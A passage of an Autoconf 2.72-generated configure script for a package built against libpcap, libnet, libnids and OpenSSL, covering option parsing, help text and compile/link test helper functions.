cache_file=config.cache ;; -datadir | --datadir | --datadi | --datad) ac_prev=datadir ;; -datadir=* | --datadir=* | --datadi=* | --datad=*) datadir=$ac_optarg ;; -datarootdir | --datarootdir | --datarootdi | --datarootd | --dataroot \ | --dataroo | --dataro | --datar) ac_prev=datarootdir ;; -datarootdir=* | --datarootdir=* | --datarootdi=* | --datarootd=* \ | --dataroot=* | --dataroo=* | --dataro=* | --datar=*) datarootdir=$ac_optarg ;; -disable-* | --disable-*) ac_useropt=`expr "x$ac_option" : 'x-*disable-\(.*\)'` # Reject names that are not valid shell variable names. expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && as_fn_error $? "invalid feature name: '$ac_useropt'" ac_useropt_orig=$ac_useropt ac_useropt=`printf "%s\n" "$ac_useropt" | sed 's/[-+.]/_/g'` case $ac_user_opts in *" "enable_$ac_useropt" "*) ;; *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--disable-$ac_useropt_orig" ac_unrecognized_sep=', ';; esac eval enable_$ac_useropt=no ;; -docdir | --docdir | --docdi | --doc | --do) ac_prev=docdir ;; -docdir=* | --docdir=* | --docdi=* | --doc=* | --do=*) docdir=$ac_optarg ;; -dvidir | --dvidir | --dvidi | --dvid | --dvi | --dv) ac_prev=dvidir ;; -dvidir=* | --dvidir=* | --dvidi=* | --dvid=* | --dvi=* | --dv=*) dvidir=$ac_optarg ;; -enable-* | --enable-*) ac_useropt=`expr "x$ac_option" : 'x-*enable-\([^=]*\)'` # Reject names that are not valid shell variable names. expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && as_fn_error $? "invalid feature name: '$ac_useropt'" ac_useropt_orig=$ac_useropt ac_useropt=`printf "%s\n" "$ac_useropt" | sed 's/[-+.]/_/g'` case $ac_user_opts in *" "enable_$ac_useropt" "*) ;; *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--enable-$ac_useropt_orig" ac_unrecognized_sep=', ';; esac eval enable_$ac_useropt=\$ac_optarg ;; -exec-prefix | --exec_prefix | --exec-prefix | --exec-prefi \ | --exec-pref | --exec-pre | --exec-pr | --exec-p | --exec- \ | --exec | --exe | --ex) ac_prev=exec_prefix ;; -exec-prefix=* | --exec_prefix=* | --exec-prefix=* | --exec-prefi=* \ | --exec-pref=* | --exec-pre=* | --exec-pr=* | --exec-p=* | --exec-=* \ | --exec=* | --exe=* | --ex=*) exec_prefix=$ac_optarg ;; -gas | --gas | --ga | --g) # Obsolete; use --with-gas. with_gas=yes ;; -help | --help | --hel | --he | -h) ac_init_help=long ;; -help=r* | --help=r* | --hel=r* | --he=r* | -hr*) ac_init_help=recursive ;; -help=s* | --help=s* | --hel=s* | --he=s* | -hs*) ac_init_help=short ;; -host | --host | --hos | --ho) ac_prev=host_alias ;; -host=* | --host=* | --hos=* | --ho=*) host_alias=$ac_optarg ;; -htmldir | --htmldir | --htmldi | --htmld | --html | --htm | --ht) ac_prev=htmldir ;; -htmldir=* | --htmldir=* | --htmldi=* | --htmld=* | --html=* | --htm=* \ | --ht=*) htmldir=$ac_optarg ;; -includedir | --includedir | --includedi | --included | --include \ | --includ | --inclu | --incl | --inc) ac_prev=includedir ;; -includedir=* | --includedir=* | --includedi=* | --included=* | --include=* \ | --includ=* | --inclu=* | --incl=* | --inc=*) includedir=$ac_optarg ;; -infodir | --infodir | --infodi | --infod | --info | --inf) ac_prev=infodir ;; -infodir=* | --infodir=* | --infodi=* | --infod=* | --info=* | --inf=*) infodir=$ac_optarg ;; -libdir | --libdir | --libdi | --libd) ac_prev=libdir ;; -libdir=* | --libdir=* | --libdi=* | --libd=*) libdir=$ac_optarg ;; -libexecdir | --libexecdir | --libexecdi | --libexecd | --libexec \ | --libexe | --libex | --libe) ac_prev=libexecdir ;; -libexecdir=* | --libexecdir=* | --libexecdi=* | --libexecd=* | --libexec=* \ | --libexe=* | --libex=* | --libe=*) libexecdir=$ac_optarg ;; -localedir | --localedir | --localedi | --localed | --locale) ac_prev=localedir ;; -localedir=* | --localedir=* | --localedi=* | --localed=* | --locale=*) localedir=$ac_optarg ;; -localstatedir | --localstatedir | --localstatedi | --localstated \ | --localstate | --localstat | --localsta | --localst | --locals) ac_prev=localstatedir ;; -localstatedir=* | --localstatedir=* | --localstatedi=* | --localstated=* \ | --localstate=* | --localstat=* | --localsta=* | --localst=* | --locals=*) localstatedir=$ac_optarg ;; -mandir | --mandir | --mandi | --mand | --man | --ma | --m) ac_prev=mandir ;; -mandir=* | --mandir=* | --mandi=* | --mand=* | --man=* | --ma=* | --m=*) mandir=$ac_optarg ;; -nfp | --nfp | --nf) # Obsolete; use --without-fp. with_fp=no ;; -no-create | --no-create | --no-creat | --no-crea | --no-cre \ | --no-cr | --no-c | -n) no_create=yes ;; -no-recursion | --no-recursion | --no-recursio | --no-recursi \ | --no-recurs | --no-recur | --no-recu | --no-rec | --no-re | --no-r) no_recursion=yes ;; -oldincludedir | --oldincludedir | --oldincludedi | --oldincluded \ | --oldinclude | --oldinclud | --oldinclu | --oldincl | --oldinc \ | --oldin | --oldi | --old | --ol | --o) ac_prev=oldincludedir ;; -oldincludedir=* | --oldincludedir=* | --oldincludedi=* | --oldincluded=* \ | --oldinclude=* | --oldinclud=* | --oldinclu=* | --oldincl=* | --oldinc=* \ | --oldin=* | --oldi=* | --old=* | --ol=* | --o=*) oldincludedir=$ac_optarg ;; -prefix | --prefix | --prefi | --pref | --pre | --pr | --p) ac_prev=prefix ;; -prefix=* | --prefix=* | --prefi=* | --pref=* | --pre=* | --pr=* | --p=*) prefix=$ac_optarg ;; -program-prefix | --program-prefix | --program-prefi | --program-pref \ | --program-pre | --program-pr | --program-p) ac_prev=program_prefix ;; -program-prefix=* | --program-prefix=* | --program-prefi=* \ | --program-pref=* | --program-pre=* | --program-pr=* | --program-p=*) program_prefix=$ac_optarg ;; -program-suffix | --program-suffix | --program-suffi | --program-suff \ | --program-suf | --program-su | --program-s) ac_prev=program_suffix ;; -program-suffix=* | --program-suffix=* | --program-suffi=* \ | --program-suff=* | --program-suf=* | --program-su=* | --program-s=*) program_suffix=$ac_optarg ;; -program-transform-name | --program-transform-name \ | --program-transform-nam | --program-transform-na \ | --program-transform-n | --program-transform- \ | --program-transform | --program-transfor \ | --program-transfo | --program-transf \ | --program-trans | --program-tran \ | --progr-tra | --program-tr | --program-t) ac_prev=program_transform_name ;; -program-transform-name=* | --program-transform-name=* \ | --program-transform-nam=* | --program-transform-na=* \ | --program-transform-n=* | --program-transform-=* \ | --program-transform=* | --program-transfor=* \ | --program-transfo=* | --program-transf=* \ | --program-trans=* | --program-tran=* \ | --progr-tra=* | --program-tr=* | --program-t=*) program_transform_name=$ac_optarg ;; -pdfdir | --pdfdir | --pdfdi | --pdfd | --pdf | --pd) ac_prev=pdfdir ;; -pdfdir=* | --pdfdir=* | --pdfdi=* | --pdfd=* | --pdf=* | --pd=*) pdfdir=$ac_optarg ;; -psdir | --psdir | --psdi | --psd | --ps) ac_prev=psdir ;; -psdir=* | --psdir=* | --psdi=* | --psd=* | --ps=*) psdir=$ac_optarg ;; -q | -quiet | --quiet | --quie | --qui | --qu | --q \ | -silent | --silent | --silen | --sile | --sil) silent=yes ;; -runstatedir | --runstatedir | --runstatedi | --runstated \ | --runstate | --runstat | --runsta | --runst | --runs \ | --run | --ru | --r) ac_prev=runstatedir ;; -runstatedir=* | --runstatedir=* | --runstatedi=* | --runstated=* \ | --runstate=* | --runstat=* | --runsta=* | --runst=* | --runs=* \ | --run=* | --ru=* | --r=*) runstatedir=$ac_optarg ;; -sbindir | --sbindir | --sbindi | --sbind | --sbin | --sbi | --sb) ac_prev=sbindir ;; -sbindir=* | --sbindir=* | --sbindi=* | --sbind=* | --sbin=* \ | --sbi=* | --sb=*) sbindir=$ac_optarg ;; -sharedstatedir | --sharedstatedir | --sharedstatedi \ | --sharedstated | --sharedstate | --sharedstat | --sharedsta \ | --sharedst | --shareds | --shared | --share | --shar \ | --sha | --sh) ac_prev=sharedstatedir ;; -sharedstatedir=* | --sharedstatedir=* | --sharedstatedi=* \ | --sharedstated=* | --sharedstate=* | --sharedstat=* | --sharedsta=* \ | --sharedst=* | --shareds=* | --shared=* | --share=* | --shar=* \ | --sha=* | --sh=*) sharedstatedir=$ac_optarg ;; -site | --site | --sit) ac_prev=site ;; -site=* | --site=* | --sit=*) site=$ac_optarg ;; -srcdir | --srcdir | --srcdi | --srcd | --src | --sr) ac_prev=srcdir ;; -srcdir=* | --srcdir=* | --srcdi=* | --srcd=* | --src=* | --sr=*) srcdir=$ac_optarg ;; -sysconfdir | --sysconfdir | --sysconfdi | --sysconfd | --sysconf \ | --syscon | --sysco | --sysc | --sys | --sy) ac_prev=sysconfdir ;; -sysconfdir=* | --sysconfdir=* | --sysconfdi=* | --sysconfd=* | --sysconf=* \ | --syscon=* | --sysco=* | --sysc=* | --sys=* | --sy=*) sysconfdir=$ac_optarg ;; -target | --target | --targe | --targ | --tar | --ta | --t) ac_prev=target_alias ;; -target=* | --target=* | --targe=* | --targ=* | --tar=* | --ta=* | --t=*) target_alias=$ac_optarg ;; -v | -verbose | --verbose | --verbos | --verbo | --verb) verbose=yes ;; -version | --version | --versio | --versi | --vers | -V) ac_init_version=: ;; -with-* | --with-*) ac_useropt=`expr "x$ac_option" : 'x-*with-\([^=]*\)'` # Reject names that are not valid shell variable names. expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && as_fn_error $? "invalid package name: '$ac_useropt'" ac_useropt_orig=$ac_useropt ac_useropt=`printf "%s\n" "$ac_useropt" | sed 's/[-+.]/_/g'` case $ac_user_opts in *" "with_$ac_useropt" "*) ;; *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--with-$ac_useropt_orig" ac_unrecognized_sep=', ';; esac eval with_$ac_useropt=\$ac_optarg ;; -without-* | --without-*) ac_useropt=`expr "x$ac_option" : 'x-*without-\(.*\)'` # Reject names that are not valid shell variable names. expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && as_fn_error $? "invalid package name: '$ac_useropt'" ac_useropt_orig=$ac_useropt ac_useropt=`printf "%s\n" "$ac_useropt" | sed 's/[-+.]/_/g'` case $ac_user_opts in *" "with_$ac_useropt" "*) ;; *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--without-$ac_useropt_orig" ac_unrecognized_sep=', ';; esac eval with_$ac_useropt=no ;; --x) # Obsolete; use --with-x. with_x=yes ;; -x-includes | --x-includes | --x-include | --x-includ | --x-inclu \ | --x-incl | --x-inc | --x-in | --x-i) ac_prev=x_includes ;; -x-includes=* | --x-includes=* | --x-include=* | --x-includ=* | --x-inclu=* \ | --x-incl=* | --x-inc=* | --x-in=* | --x-i=*) x_includes=$ac_optarg ;; -x-libraries | --x-libraries | --x-librarie | --x-librari \ | --x-librar | --x-libra | --x-libr | --x-lib | --x-li | --x-l) ac_prev=x_libraries ;; -x-libraries=* | --x-libraries=* | --x-librarie=* | --x-librari=* \ | --x-librar=* | --x-libra=* | --x-libr=* | --x-lib=* | --x-li=* | --x-l=*) x_libraries=$ac_optarg ;; -*) as_fn_error $? "unrecognized option: '$ac_option' Try '$0 --help' for more information" ;; *=*) ac_envvar=`expr "x$ac_option" : 'x\([^=]*\)='` # Reject names that are not valid shell variable names. case $ac_envvar in #( '' | [0-9]* | *[!_$as_cr_alnum]* ) as_fn_error $? "invalid variable name: '$ac_envvar'" ;; esac eval $ac_envvar=\$ac_optarg export $ac_envvar ;; *) # FIXME: should be removed in autoconf 3.0. printf "%s\n" "$as_me: WARNING: you should use --build, --host, --target" >&2 expr "x$ac_option" : ".*[^-._$as_cr_alnum]" >/dev/null && printf "%s\n" "$as_me: WARNING: invalid host type: $ac_option" >&2 : "${build_alias=$ac_option} ${host_alias=$ac_option} ${target_alias=$ac_option}" ;; esac done if test -n "$ac_prev"; then ac_option=--`echo $ac_prev | sed 's/_/-/g'` as_fn_error $? "missing argument to $ac_option" fi if test -n "$ac_unrecognized_opts"; then case $enable_option_checking in no) ;; fatal) as_fn_error $? "unrecognized options: $ac_unrecognized_opts" ;; *) printf "%s\n" "$as_me: WARNING: unrecognized options: $ac_unrecognized_opts" >&2 ;; esac fi # Check all directory arguments for consistency. for ac_var in exec_prefix prefix bindir sbindir libexecdir datarootdir \ datadir sysconfdir sharedstatedir localstatedir includedir \ oldincludedir docdir infodir htmldir dvidir pdfdir psdir \ libdir localedir mandir runstatedir do eval ac_val=\$$ac_var # Remove trailing slashes. case $ac_val in */ ) ac_val=`expr "X$ac_val" : 'X\(.*[^/]\)' \| "X$ac_val" : 'X\(.*\)'` eval $ac_var=\$ac_val;; esac # Be sure to have absolute directory names. case $ac_val in [\\/$]* | ?:[\\/]* ) continue;; NONE | '' ) case $ac_var in *prefix ) continue;; esac;; esac as_fn_error $? "expected an absolute directory name for --$ac_var: $ac_val" done # There might be people who depend on the old broken behavior: '$host' # used to hold the argument of --host etc. # FIXME: To remove some day. build=$build_alias host=$host_alias target=$target_alias # FIXME: To remove some day. if test "x$host_alias" != x; then if test "x$build_alias" = x; then cross_compiling=maybe elif test "x$build_alias" != "x$host_alias"; then cross_compiling=yes fi fi ac_tool_prefix= test -n "$host_alias" && ac_tool_prefix=$host_alias- test "$silent" = yes && exec 6>/dev/null ac_pwd=`pwd` && test -n "$ac_pwd" && ac_ls_di=`ls -di .` && ac_pwd_ls_di=`cd "$ac_pwd" && ls -di .` || as_fn_error $? "working directory cannot be determined" test "X$ac_ls_di" = "X$ac_pwd_ls_di" || as_fn_error $? "pwd does not report name of working directory" # Find the source files, if location was not specified. if test -z "$srcdir"; then ac_srcdir_defaulted=yes # Try the directory containing this script, then the parent directory. ac_confdir=`$as_dirname -- "$as_myself" || $as_expr X"$as_myself" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ X"$as_myself" : 'X\(//\)[^/]' \| \ X"$as_myself" : 'X\(//\)$' \| \ X"$as_myself" : 'X\(/\)' \| . 2>/dev/null || printf "%s\n" X"$as_myself" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q } /^X\(\/\/\)[^/].*/{ s//\1/ q } /^X\(\/\/\)$/{ s//\1/ q } /^X\(\/\).*/{ s//\1/ q } s/.*/./; q'` srcdir=$ac_confdir if test ! -r "$srcdir/$ac_unique_file"; then srcdir=.. fi else ac_srcdir_defaulted=no fi if test ! -r "$srcdir/$ac_unique_file"; then test "$ac_srcdir_defaulted" = yes && srcdir="$ac_confdir or .." as_fn_error $? "cannot find sources ($ac_unique_file) in $srcdir" fi ac_msg="sources are in $srcdir, but 'cd $srcdir' does not work" ac_abs_confdir=`( cd "$srcdir" && test -r "./$ac_unique_file" || as_fn_error $? "$ac_msg" pwd)` # When building in place, set srcdir=. if test "$ac_abs_confdir" = "$ac_pwd"; then srcdir=. fi # Remove unnecessary trailing slashes from srcdir. # Double slashes in file names in object file debugging info # mess up M-x gdb in Emacs. case $srcdir in */) srcdir=`expr "X$srcdir" : 'X\(.*[^/]\)' \| "X$srcdir" : 'X\(.*\)'`;; esac for ac_var in $ac_precious_vars; do eval ac_env_${ac_var}_set=\${${ac_var}+set} eval ac_env_${ac_var}_value=\$${ac_var} eval ac_cv_env_${ac_var}_set=\${${ac_var}+set} eval ac_cv_env_${ac_var}_value=\$${ac_var} done # # Report the --help message. # if test "$ac_init_help" = "long"; then # Omit some internal or obsolete options to make the list less imposing. # This message is too long to be a string in the A/UX 3.1 sh. cat <<_ACEOF 'configure' configures this package to adapt to many kinds of systems. Usage: $0 [OPTION]... [VAR=VALUE]... To assign environment variables (e.g., CC, CFLAGS...), specify them as VAR=VALUE. See below for descriptions of some of the useful variables. Defaults for the options are specified in brackets. Configuration: -h, --help display this help and exit --help=short display options specific to this package --help=recursive display the short help of all the included packages -V, --version display version information and exit -q, --quiet, --silent do not print 'checking ...' messages --cache-file=FILE cache test results in FILE [disabled] -C, --config-cache alias for '--cache-file=config.cache' -n, --no-create do not create output files --srcdir=DIR find the sources in DIR [configure dir or '..'] Installation directories: --prefix=PREFIX install architecture-independent files in PREFIX [$ac_default_prefix] --exec-prefix=EPREFIX install architecture-dependent files in EPREFIX [PREFIX] By default, 'make install' will install all the files in '$ac_default_prefix/bin', '$ac_default_prefix/lib' etc. You can specify an installation prefix other than '$ac_default_prefix' using '--prefix', for instance '--prefix=\$HOME'. For better control, use the options below. Fine tuning of the installation directories: --bindir=DIR user executables [EPREFIX/bin] --sbindir=DIR system admin executables [EPREFIX/sbin] --libexecdir=DIR program executables [EPREFIX/libexec] --sysconfdir=DIR read-only single-machine data [PREFIX/etc] --sharedstatedir=DIR modifiable architecture-independent data [PREFIX/com] --localstatedir=DIR modifiable single-machine data [PREFIX/var] --runstatedir=DIR modifiable per-process data [LOCALSTATEDIR/run] --libdir=DIR object code libraries [EPREFIX/lib] --includedir=DIR C header files [PREFIX/include] --oldincludedir=DIR C header files for non-gcc [/usr/include] --datarootdir=DIR read-only arch.-independent data root [PREFIX/share] --datadir=DIR read-only architecture-independent data [DATAROOTDIR] --infodir=DIR info documentation [DATAROOTDIR/info] --localedir=DIR locale-dependent data [DATAROOTDIR/locale] --mandir=DIR man documentation [DATAROOTDIR/man] --docdir=DIR documentation root [DATAROOTDIR/doc/PACKAGE] --htmldir=DIR html documentation [DOCDIR] --dvidir=DIR dvi documentation [DOCDIR] --pdfdir=DIR pdf documentation [DOCDIR] --psdir=DIR ps documentation [DOCDIR] _ACEOF cat <<\_ACEOF X features: --x-includes=DIR X include files are in DIR --x-libraries=DIR X library files are in DIR _ACEOF fi if test -n "$ac_init_help"; then cat <<\_ACEOF Optional Features: --disable-option-checking ignore unrecognized --enable/--with options --disable-FEATURE do not include FEATURE (same as --enable-FEATURE=no) --enable-FEATURE[=ARG] include FEATURE [ARG=yes] --enable-static Compile static binary --enable-berkeleydb Build with BerkeleyDB Optional Packages: --with-PACKAGE[=ARG] use PACKAGE [ARG=yes] --without-PACKAGE do not use PACKAGE (same as --with-PACKAGE=no) --with-x use the X Window System --with-db=DIR use Berkeley DB (with --enable-compat185) in DIR --with-libpcap=DIR use libpcap in DIR --with-libnet=DIR use libnet in DIR --with-libnids=DIR use libnids in DIR --with-openssl=DIR use OpenSSL in DIR Some influential environment variables: CC C compiler command CFLAGS C compiler flags LDFLAGS linker flags, e.g. -L if you have libraries in a nonstandard directory LIBS libraries to pass to the linker, e.g. -l CPPFLAGS (Objective) C/C++ preprocessor flags, e.g. -I if you have headers in a nonstandard directory XMKMF Path to xmkmf, Makefile generator for X Window System CPP C preprocessor Use these variables to override the choices made by 'configure' or to help it to find libraries and programs with nonstandard names/locations. Report bugs to the package provider. _ACEOF ac_status=$? fi if test "$ac_init_help" = "recursive"; then # If there are subdirs, report their specific --help. for ac_dir in : $ac_subdirs_all; do test "x$ac_dir" = x: && continue test -d "$ac_dir" || { cd "$srcdir" && ac_pwd=`pwd` && srcdir=. && test -d "$ac_dir"; } || continue ac_builddir=. case "$ac_dir" in .) ac_dir_suffix= ac_top_builddir_sub=. ac_top_build_prefix= ;; *) ac_dir_suffix=/`printf "%s\n" "$ac_dir" | sed 's|^\.[\\/]||'` # A ".." for each directory in $ac_dir_suffix. ac_top_builddir_sub=`printf "%s\n" "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'` case $ac_top_builddir_sub in "") ac_top_builddir_sub=. ac_top_build_prefix= ;; *) ac_top_build_prefix=$ac_top_builddir_sub/ ;; esac ;; esac ac_abs_top_builddir=$ac_pwd ac_abs_builddir=$ac_pwd$ac_dir_suffix # for backward compatibility: ac_top_builddir=$ac_top_build_prefix case $srcdir in .) # We are building in place. ac_srcdir=. ac_top_srcdir=$ac_top_builddir_sub ac_abs_top_srcdir=$ac_pwd ;; [\\/]* | ?:[\\/]* ) # Absolute name. ac_srcdir=$srcdir$ac_dir_suffix; ac_top_srcdir=$srcdir ac_abs_top_srcdir=$srcdir ;; *) # Relative name. ac_srcdir=$ac_top_build_prefix$srcdir$ac_dir_suffix ac_top_srcdir=$ac_top_build_prefix$srcdir ac_abs_top_srcdir=$ac_pwd/$srcdir ;; esac ac_abs_srcdir=$ac_abs_top_srcdir$ac_dir_suffix cd "$ac_dir" || { ac_status=$?; continue; } # Check for configure.gnu first; this name is used for a wrapper for # Metaconfig's "Configure" on case-insensitive file systems. if test -f "$ac_srcdir/configure.gnu"; then echo && $SHELL "$ac_srcdir/configure.gnu" --help=recursive elif test -f "$ac_srcdir/configure"; then echo && $SHELL "$ac_srcdir/configure" --help=recursive else printf "%s\n" "$as_me: WARNING: no configuration information is in $ac_dir" >&2 fi || ac_status=$? cd "$ac_pwd" || { ac_status=$?; break; } done fi test -n "$ac_init_help" && exit $ac_status if $ac_init_version; then cat <<\_ACEOF configure generated by GNU Autoconf 2.72 Copyright (C) 2023 Free Software Foundation, Inc. This configure script is free software; the Free Software Foundation gives unlimited permission to copy, distribute and modify it. _ACEOF exit fi ## ------------------------ ## ## Autoconf initialization. ## ## ------------------------ ## # ac_fn_c_try_compile LINENO # -------------------------- # Try to compile conftest.$ac_ext, and return whether this succeeded. ac_fn_c_try_compile () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack rm -f conftest.$ac_objext conftest.beam if { { ac_try="$ac_compile" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" printf "%s\n" "$ac_try_echo"; } >&5 (eval "$ac_compile") 2>conftest.err ac_status=$? if test -s conftest.err; then grep -v '^ *+' conftest.err >conftest.er1 cat conftest.er1 >&5 mv -f conftest.er1 conftest.err fi printf "%s\n" "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } && { test -z "$ac_c_werror_flag" || test ! -s conftest.err } && test -s conftest.$ac_objext then : ac_retval=0 else case e in #( e) printf "%s\n" "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 ac_retval=1 ;; esac fi eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno as_fn_set_status $ac_retval } # ac_fn_c_try_compile # ac_fn_c_try_link LINENO # ----------------------- # Try to link conftest.$ac_ext, and return whether this succeeded. ac_fn_c_try_link () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack rm -f conftest.$ac_objext conftest.beam conftest$ac_exeext if { { ac_try="$ac_link" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" printf "%s\n" "$ac_try_echo"; } >&5 (eval "$ac_link") 2>conftest.err ac_status=$? if test -s conftest.err; then grep -v '^ *+' conftest.err >conftest.er1 cat conftest.er1 >&5 mv -f conftest.er1 conftest.err fi printf "%s\n" "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } && { test -z "$ac_c_werror_flag" || test ! -s conftest.err } && test -s conftest$ac_exeext && { test "$cross_compiling" = yes || test -x conftest$ac_exeext } then : ac_retval=0 else case e in #( e) printf "%s\n" "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 ac_retval=1 ;; esac fi # Delete the IPA/IPO (Inter Procedural Analysis/Optimization) information # created by the PGI compiler (conftest_ipa8_conftest.oo), as it would # interfere with the next link command; also delete a directory that is # left behind by Apple's compiler. We do this before executing the actions. rm -rf conftest.dSYM conftest_ipa8_conftest.oo eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno as_fn_set_status $ac_retval } # ac_fn_c_try_link # ac_fn_c_try_cpp LINENO # ---------------------- # Try to preprocess conftest.$ac_ext, and return whether this succeeded. ac_fn_c_try_cpp () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack if { { ac_try="$ac_cpp conftest.$ac_ext" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" printf "%s\n" "$ac_try_echo"; } >&5 (eval "$ac_cpp conftest.$ac_ext") 2>conftest.err ac_status=$? if test -s conftest.err; then grep -v '^ *+' conftest.err >conftest.er1 cat conftest.er1 >&5 mv -f conftest.er1 conftest.err fi printf "%s\n" "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } > conftest.i && { test -z "$ac_c_preproc_warn_flag$ac_c_werror_flag" || test ! -s conftest.err } then : ac_retval=0 else case e in #( e) printf "%s\n" "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 ac_retval=1 ;; esac fi eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno as_fn_set_status $ac_retval } # ac_fn_c_try_cpp # ac_fn_c_check_func LINENO FUNC VAR # ---------------------------------- # Tests whether FUNC exists, setting the cache variable VAR accordingly ac_fn_c_check_func () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 printf %s "checking for $2... " >&6; } if eval test \${$3+y} then : printf %s "(cached) " >&6 else case e in #( e) cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Define $2 to an innocuous variant, in case declares $2. For example, HP-UX 11i declares gettimeofday. */ #define $2 innocuous_$2 /* System header to define __stub macros and hopefully few prototypes, which can conflict with char $2 (void); below. */ #include #undef $2 /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. */ #ifdef __cplusplus extern "C" #endif char $2 (void); /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ #if defined __stub_$2 || defined __stub___$2 choke me #endif int main (void) { return $2 (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : eval "$3=yes" else case e in #( e) eval "$3=no" ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext ;; esac fi eval ac_res=\$$3 { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 printf "%s\n" "$ac_res" >&6; } eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno } # ac_fn_c_check_func # ac_fn_c_check_header_compile LINENO HEADER VAR INCLUDES # ------------------------------------------------------- # Tests whether HEADER exists and can be compiled using the include files in # INCLUDES, setting the cache variable VAR accordingly. ac_fn_c_check_header_compile () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 printf %s "checking for $2... " >&6; } if eval test \${$3+y} then : printf %s "(cached) " >&6 else case e in #( e) cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ $4 #include <$2> _ACEOF if ac_fn_c_try_compile "$LINENO" then : eval "$3=yes" else case e in #( e) eval "$3=no" ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam conftest.$ac_ext ;; esac fi eval ac_res=\$$3 { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 printf "%s\n" "$ac_res" >&6; } eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno } # ac_fn_c_check_header_compile # ac_fn_c_check_type LINENO TYPE VAR INCLUDES # ------------------------------------------- # Tests whether TYPE exists after having included INCLUDES, setting cache # variable VAR accordingly. ac_fn_c_check_type () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 printf %s "checking for $2... " >&6; } if eval test \${$3+y} then : printf %s "(cached) " >&6 else case e in #( e) eval "$3=no" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ $4 int main (void) { if (sizeof ($2)) return 0; ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO" then : cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ $4 int main (void) { if (sizeof (($2))) return 0; ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO" then : else case e in #( e) eval "$3=yes" ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam conftest.$ac_ext fi rm -f core conftest.err conftest.$ac_objext conftest.beam conftest.$ac_ext ;; esac fi eval ac_res=\$$3 { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 printf "%s\n" "$ac_res" >&6; } eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno } # ac_fn_c_check_type # ac_fn_c_try_run LINENO # ---------------------- # Try to run conftest.$ac_ext, and return whether this succeeded. Assumes that # executables *can* be run. ac_fn_c_try_run () { as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack if { { ac_try="$ac_link" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" printf "%s\n" "$ac_try_echo"; } >&5 (eval "$ac_link") 2>&5 ac_status=$? printf "%s\n" "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } && { ac_try='./conftest$ac_exeext' { { case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval 